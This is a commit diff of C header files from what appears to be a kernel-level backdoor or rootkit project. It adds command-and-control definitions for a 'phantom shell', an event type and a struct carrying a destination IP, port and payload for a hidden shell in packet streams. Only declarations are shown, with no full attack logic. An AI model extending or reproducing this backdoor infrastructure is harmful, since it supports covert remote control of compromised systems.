Further completed the phantom shell routine and added more checks in TC, still not finished, payload rewriting remains, but the rest is fully ready

src/common/c&c.h

@@ -28,7 +28,7 @@
 #define CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL 2
 #define CC_PROT_COMMAND_PHANTOM_SHELL 3
 
-#define CC_PROT_PHANTOM_COMMAND_LIST_HOOKS 0
+#define CC_PROT_PHANTOM_SHELL_INIT "CC_PHANTOM_INIT"
 
 //C&C V3 -- Distributed hidden payload in packet stream + encrypted shell
 struct trigger_32_t {

src/common/map_common.h

@@ -1,6 +1,8 @@
 #ifndef __MAP_COMMON_H
 #define __MAP_COMMON_H
 
+#include "struct_common.h"
+
 // Ring buffer for kernel->user communication
 #define RB_EVENT_MAX_MESSAGE_SIZE 512
 typedef enum {
@@ -8,13 +10,15 @@ typedef enum {
     DEBUG,
     EXIT,
     ERROR,
-    COMMAND
+    COMMAND,
+    PSH_UPDATE
 } event_type_t;
 
 struct rb_event {
 	int pid;
     char message[RB_EVENT_MAX_MESSAGE_SIZE];
     int code;
+    struct backdoor_phantom_shell_data bps_data;
     event_type_t event_type;
 };
 

src/common/struct_common.h

@@ -0,0 +1,13 @@
+#ifndef __H_STRUCT_COMMON
+#define __H_STRUCT_COMMON
+
+
+struct backdoor_phantom_shell_data{
+	int active;
+	unsigned int d_ip;
+	unsigned short d_port;
+	char payload[64];
+};
+
+
+#endif